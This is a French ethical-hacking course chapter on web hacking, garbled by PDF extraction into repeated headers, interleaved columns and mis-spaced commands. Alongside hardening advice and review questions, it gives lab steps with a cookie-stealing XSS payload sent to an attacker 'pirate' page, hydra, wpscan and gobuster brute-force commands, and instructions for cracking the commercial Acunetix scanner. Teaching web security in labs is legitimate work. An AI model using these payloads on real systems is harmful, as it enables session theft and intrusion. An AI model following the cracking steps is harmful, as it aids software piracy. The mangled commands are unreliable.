Vous êtes sur la page 1sur 21

SOMMAIRE

• Chap01: Introduction au «piratage éthique»

• Chap02: Collecte d'informations sur les cibles: reconnaissance, empreinte et ingénierie socialeChap03: Collecte d'informations

• sur le réseau et l'hôte: analyse et énumérationChap04: SystemHacking: Cracking de mot de passe, augmentation des privilèges

• et masquage de fichiers Chap05: chevaux de Troie, portes dérobées, virus et vers

• Chap06: Collecte de données à partir de réseaux: Sniffers Chap07:

• Déni de service et détournement de session

• Chap08: Piratage Web: Google, serveurs Web, vulnérabilités des applications Web et techniques de piratage des mots de passe basées sur le Web

• Chap09: Attaquer les applications Web: injection SQL et débordements de tampon Chap10: Hacking

• de réseau sans fil

• Chap11: Sécurité du site physique Chap12:

• Piratage des systèmes Linux

• Chap13: Piratage des plates-formes mobiles (Android) Chap14:

• Cryptanalyse
ChapitreChapitre Chapitre 8: Piratage Web: Google, serveurs Web, appl icat ion Web

86 Vulnerabi lit ies et techniques de piratage de mots de passe basées sur le Web

OBJECTIFS COUVERTS DANS CE CHAPITRE

Lister les types de vulnérabilités de serveur Web Menaces d'applications Web

Comprendre les attaques contre les serveurs Web Comprendre le piratage de Google

Comprendre les exploits Unicode IIS Comprendre les contre-mesures des applications Web

Comprendre les techniques de gestion des correctifs Lister les types d'authentification

Comprendre le scanner d'applications Web Qu'est-ce qu'un cracker de mot de passe?

Qu'est-ce que le framework Metasploit? Comment fonctionne un cracker de mot de passe?

Décrire les méthodes de renforcement du serveur Web Comprendre les attaques par mot de passe - classification

Comprendre le fonctionnement des applications Web Comprendre passwo contre-mesures anti-fissuration

Objectifs du piratage d'applications Web

Anatomie d'une attaque


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Fonctionnement
• des
Lesserveurs Web
serveurs Web utilisent le protocole de transfert hypertexte ( HTTP ) et Hypertext Transfer Protocol Secure ( HTTPS ) pour permettre aux clients Web de s'y

connecter et d'afficher et de télécharger des fichiers. HTTP est un protocole de couche d'application dans le

TCP / IP empiler. HTTP et HTTPS sont les principaux protocoles utilisés par les clients Web accédant aux pages Web résidant sur des serveurs Web sur Internet.

Langage Signalétique Hyper Text ( HTML ) est le langage utilisé pour créer des pages Web et permet à ces pages d'être rendues dans un logiciel de navigateur Web

sur des clients Web


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Types de vulnérabilités du serveur Web

Bogues du système d'exploitation ou de


Mauvaise configuration du Web
l'application, ou défauts de programmation Installati par défaut vulnérable sur
Logiciel serveur
Code

• Un problème courant lié à l’utilisation des • Tous les programmes, y compris le système • Les paramètres du système d'exploitation et du
informations Internet de Microsoft d'exploitation et les applications du serveur logiciel de serveur Web ne doivent pas être
Web, doivent être régulièrement corrigés ou laissés à leurs valeurs par défaut lors de
Le serveur (IIS) en tant que serveur Web est mis à jour. l'installation et doivent être mis à jour en
l'utilisation du site Web par défaut. Les permanence.
autorisations sur le site Web par défaut sont • Pour les systèmes Windows, cela inclut
les correctifs de sécurité,
ouvertes, ce qui signifie que les paramètres par
défaut laissent le site ouvert aux attaques correctifs et mises à jour Windows.
• Tous ces correctifs peuvent être automatisés
ou appliqués manuellement aux systèmes
une fois qu'ils ont été testés
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Attaquer un serveur
ExErCiSE Web
8.1: Capture de bannière

1. À l'invite de commande sur votre PC Windows, tapez:

telnet www.microsoft.com 80

2. Ensuite, dans la fenêtre telnet, tapez:

HEAD HTTP / 1.1

Appuyez ensuite sur Entrée

La bannière du serveur Web sera alors retournée. La bannière ressemblera à ce qui suit:
Serveur: AkamaiGHost

Version Mime: 1.0

Type de contenu: texte / html

Contenu-Longueur: 216

Expire le: jeu.23 janvier 2020 10:23:45 GMT Date:

jeu.23 janvier 2020 10:23:45 GMT Connexion: close


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Dégraissant• La dégradation d'un site Web signifie que le pirate informatique exploite une vulnérabilité dans le système d'exploitation ou le logiciel du serveur Web, puis

modifie les fichiers du site Web pour montrer que le site a été piraté. Souvent, le pirate affiche son nom de pirate sur la page d'accueil du site Web

• Capture des informations d'identification de l'administrateur par le biais d'attaques

man-in-the-middle

• Révéler un mot de passe administrateur via une attaque par force brute

• Compromettre un serveur FTP ou de messagerie

• Exploiter les bogues des applications Web qui entraînent une vulnérabilité

• Utilisation d'attaques par injection SQL (si le serveur SQL et le serveur Web sont le même
système)

• Utilisation de l'intrusion telnet ou Secure Shell (SSH)

• Utilisation d'une extension de serveur Web ou d'une intrusion de service à distance

http://www.zone-h.org
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Méthodes de renforcement du serveur Web


• Renommez le compte administrateur et utilisez un mot de passe fort

• Désactiver les sites Web et FTP par défaut

• Supprimez les applications inutilisées du serveur, telles que WebDAV.

• Les applications inutiles peuvent être supprimées sur un serveur en utilisant Ajouter / Supprimer des programmes dans le Panneau de configuration Windows.

• Désactivez la navigation dans les répertoires dans les paramètres de configuration du serveur Web.

• Ajoutez une mention légale au site pour informer les attaquants potentiels des implications du piratage du site.

• Appliquez les derniers correctifs, hotfix et service packs au système d'exploitation et au logiciel de serveur Web.

• Effectuez une vérification des limites sur l'entrée pour les formulaires Web et les chaînes de requête pour éviter le dépassement de mémoire tampon ou les attaques
d'entrée malveillantes.

• Désactivez l'administration à distance.

• Utilisez un script pour mapper les extensions de fichier inutilisées à un message d'erreur 404 («Fichier non trouvé»).

• Activez l'audit et la journalisation.

https://www.ansi.tn/sites/default/files/articleguides/file/mise_en_place_serveur_web.pdf
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Menaces des applications Web


Script intersite Un paramètre entré dans un formulaire Web est traité par l'application Web. La combinaison correcte de variables peut entraîner
l'exécution arbitraire de commandes. Contre-mesure: valider les cookies, les chaînes de requête, les champs de formulaire et les champs masqués

Injection SQL L'insertion de commandes SQL dans l'URL permet au serveur de base de données de vider, de modifier, de supprimer ou de créer des informations dans la

base de données. L'injection SQL est traitée en détail au chapitre 9, «Attaquer les applications: injection SQL et débordements de tampon». Contre-mesure: valider les

variables utilisateur.

Injection de commande Le pirate insère des commandes de programmation dans un formulaire Web. Contre-mesure: utilisez des bibliothèques spécifiques au langage pour

le langage de programmation.

Empoisonnement des cookies et Snooping Le pirate informatique corrompt ou vole des cookies. Contre-mesures: ne stockez pas les mots de passe dans un cookie; mettre

en œuvre des délais d'expiration des cookies; et authentifier les cookies.

Débordement de tampon D'énormes quantités de données sont envoyées à une application Web via un formulaire Web pour exécuter des commandes. Les
débordements de tampon sont traités en détail au chapitre 9. Contre-mesures: valider la longueur d'entrée utilisateur; effectuer une vérification des limites.

Détournement d'authentification Le pirate vole une session une fois qu'un utilisateur s'est authentifié. Contre-mesure: utilisez SSL pour crypter le trafic.

Traversée de répertoire / Unicode Le pirate parcourt les dossiers d'un système via un navigateur Web ou l'explorateur Windows. Contre-mesures: définir les
droits d'accès aux dossiers privés sur le serveur Web; appliquer des correctifs et des correctifs.
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Menaces desExErCiSE 8.1:


applications Forçage brutal d'annuaire (gobuster)
Web

apt-get install gobuster

apt-get install seclists (télécharger les dictionnaires dans / usr / share / seclists /)

root @ kali : ~ # gobuster dir -u http: // xxxx -w /usr/share/seclists/Discovery/Web-Content/common.txt

Test de gobuster sur:

- http://testphp.vulnweb.com/

- http://webscantest.com/
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Menaces desExErCiSE 8.1:Web


applications XSS

1. Sur Windows 7 SP1 VM, installez wampserver Outils \ chapitre 8 \ XSS \ WampServer.exe:

(autoriser l'accès de tous: recherchez <Répertoire "c: / wamp / www /">

2. Sur Windows 7 SP1 Déployez un site Web vulnérable: Outils \ chapitre 8 \ XSS \ application web vulnérable netspace

3. Sur le site Web de l'attaquant de déploiement de Windows 7 SP1: \ Outils \ pirate

4. Sous Windows 7 SP1 Connectez-vous avec cet utilisateur sur un site Web vulnérable:

- 1 compte: user1@mail.com user1

- Compte 2: foulan@mail.com 123456789

5. Sous Windows 7 SP1, accédez à http://127.0.0.1/netspace/pages/book.php

Insérez ce javascript:

<script language = "JavaScript">

document.location = "http://127.0.0.1/pirate/index.php?cookie=" + document.cookie; </script>

6. Sous Windows 7 SP1 Connectez-vous avec user2@mail.com / user2

7. Redirection vers un site Web «pirate»

8. Sur votre machine, accédez à http: //ip_of_windows7/pirate/result.txt Dans result.txt copiez PHPSESSID

9. Ajouter EditThisCookies au chrome

10. Créez de nouveaux cookies et connectez-vous au site Web


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Menaces desExErCiSE 8.2:Web


applications utilisation Acunetix Scanner de vulnérabilité Web

Outils \ chapitre 8 \ Acunetix V10.5

1. Installation et fissure

ÉTAPE 1. INSTALLACUNETIX WEB VULNERABILITY SCANNER 10.EXE

ÉTAPE 2. IL Y A UN .EXE APPELÉ ACTIVATION.EXE, METTEZ-LE DANS LE RÉPERTOIRE O VOUS AVEZ INSTALLÉ LE SCANNER DE

VULNÉRABILITÉ WEB ACUNETIX 10.

ÉTAPE 3. OUVREZ THEACUNETIX EN TANT QU'ADMINISTRATEUR ET VOUS OBTENEZ L'INSCRIPTION:

• JEMOEDER@LIVE.NL

• 0654321234

LES AUTRES CHOSES N'ONT PAS D'IMPORTANCE.

ÉTAPE 4. UNE FOIS QUE VOUS L'INSCRIREZ, LORSQUE LE SCANNER DE VULNÉRABILITÉ ACUNETIXWEB SE CHARGE, VOUS OBTENEZ UNE ERREUR, IL EST JUSTE

L'ANNULER ET IL FONCTIONNE

2. Ouvrez le scanner Web et sélectionnez Fichier • Nouvelle analyse pour ouvrir l'assistant d'analyse

3. Suivez les invites de l'assistant; acceptez les valeurs par défaut pour l'analyse initiale.

4. Affichez le rapport d'analyse une fois l'analyse terminée. Notez les vulnérabilités du serveur Web et de l'application dans le rapport d'analyse
Cours du jour
PENTES
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Techniques •WebTypes
de piratage des mots de passe
d'authentification

Authentification HTTP de base

• Envoie le nom d’utilisateur et le mot de passe en texte clair,

Authentification Digest

• hache les informations d'identification et utilise un modèle de défi-réponse pour l'authentification

• Attaques de mot de passe et piratage de mot de passe

dictionnaire Force brute Hybride

• Utilise des mots de passe qui • Devine complexe • Utilise les mots du dictionnaire
se trouve dans un mots de passe qui utilisent avec un nombre ou un
dictionnaire lettres, chiffres et caractère spécial en
Caractère spécial remplacement d'une lette
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 Techniques •WebTypes
de piratage des mots de passe
d'authentification

Authentification HTTP de base

• Envoie le nom d’utilisateur et le mot de passe en texte clair,

Authentification Digest

• hache les informations d'identification et utilise un modèle de défi-réponse pour l'authentification

• Attaques de mot de passe et piratage de mot de passe

dictionnaire Force brute Hybride

• Utilise des mots de passe qui • Devine complexe • Utilise les mots du dictionnaire
se trouve dans un mots de passe qui utilisent avec un nombre ou un
dictionnaire lettres, chiffres et caractère spécial en
Caractère spécial remplacement d'une lette
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 TechniquesExErCiSE
Web de8.3:
piratage des
créer un mots de personnalisé
dictionnaire passe

- ExErCiSE 8.2.1: Cewl

root @ kali : ~ # cewl https://www.microsoft.com/fr-tn> microsoft.txt

• Générer un dic à partir d'une page Web

- ExErCiSE 8.2.1: croquer

1- Tapez man crunch et consultez l'aide

1- Créez un dictionnaire de mots commençant par 71 et nombre seulement et longueur 8

root @ kali : ~ # crunch 8 8 -t 71 %%%%%% -o dict1.txt

2- L'adresse e-mail de l'entreprise (delta) des employés est la suivante:

first_letter_of_name.three_letters_of_first_name@delta , com

Tâche: Créer un dictionnaire des adresses e-mail possibles de tous les employés

root @ kali : ~ # crunch 15 15 -t @ . @ @@ *. com -o dict2.txt

root @ kali : ~ # sed -is / * / @ / dict2.txt

bash # sed -is / [text_to_search_for] / [nouveau_texte] / monfichier.txt


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 TechniquesExErCiSE
Web de8.4:
piratage des mots de passe
page d'administration de Bruteforcing Wordpress

1- Déployer la VM DC2: \ Tools \ chapitre 8 \ DC-2.ova 2- Depuis

Kali:

> Scannez avec nmap pour obtenir l'adresse IP

> Scanner l'adresse IP pour afficher les ports

> La cible est un site web wordpress; scannez-le avec wpscan

> wpscan --url http://192.168.1.129

> wpscan --url http://192.168.1.129 --enumerate u

• donnez-nous la liste des utilisateurs

> Utilisez Cewl pour générer une liste de mots à partir du site Web

> wpscan --url http: // dc-2 / -U jerry -P /root/Desktop/my_custom.txt


Attaques web http://webscantest.com

• HTTP Force Brute

http://webscantest.com/login.php

Télécharger le dictionnaire: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/CommonCredentials/10k-most-common.txt

root @ kali : ~ # hydra -l testuser -P 10k-most-common.txt


"webscantest.com" http-post-form "/login.php:login=^USER̂ & passwd = ^ PASS ^ & submit_login = login: Nom d'utilisateur ou mot de passe incorrect" -V -I
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86 TechniquesExErCiSE 8.5: ai-je


Web de piratage des été
motspwned
de passe

1- aller à: https://haveibeenpwned.com/

2- Vérifiez votre email


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,
ChapitreChapitre et techniques de crackage de mot de passe basées sur le Web

86

Questions de révision du chapitre 8


Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,

pptêterr
ChapitreCC hhaa et techniques de crackage de mot de passe basées sur le Web

86 6 Cryptage
2. Laquelle des propositions suivantes est une contre-mesure pour une attaque par débordement de tampon?
C. Pare-feu
A. Validation de la longueur du champ de saisie
D. Utilisation des formulaires Web

4. Quelle est une vulnérabilité de serveur Web courante?

A. Comptes d'utilisateurs limités


B. Installation par défaut
C. Actions ouvertes
D. Pas d'accès au répertoire

6. Laquelle des propositions suivantes est une contre-mesure pour le détournement d'authentification?

A. Journalisation d'authentification
B. Kerberos
C. SSL
D. Active Directory
Web Hack i ng: Goog le, Web Se rve rs, Web App li ca ti on Vu l ne rab iliti es,

pptêterr
ChapitreCC hhaa et techniques de crackage de mot de passe basées sur le Web

8 66 A. Appliquer les autorisations aux dossiers.


9. Quelle est une contre-mesure à une attaque par traversée de répertoire?
B. Autorisez tout le monde à accéder uniquement à la page par défaut.

C. Autoriser uniquement les utilisateurs enregistrés à accéder à la page d'accueil d'un site Web.
D.Faites en sorte que tous les utilisateurs se connectent pour accéder aux dossiers

10. Comment s'appelle-t-il lorsqu'un hacker insère des commandes de programmation dans un formulaire Web?
A. Falsification de formulaire
B. Injection de commande
C. Débordement de tampon
Attaque par formulaire Web

11. Laquelle des commandes suivantes commencerait à exécuter une capture de bannière sur un serveur Web?

UNE. telnet www.yahoo.com 80


B. telnet HTTP www.yahoo.com
C. http://www.yahoo.com:80
RÉ. HEAD www.yahoo.com

Vous aimerez peut-être aussi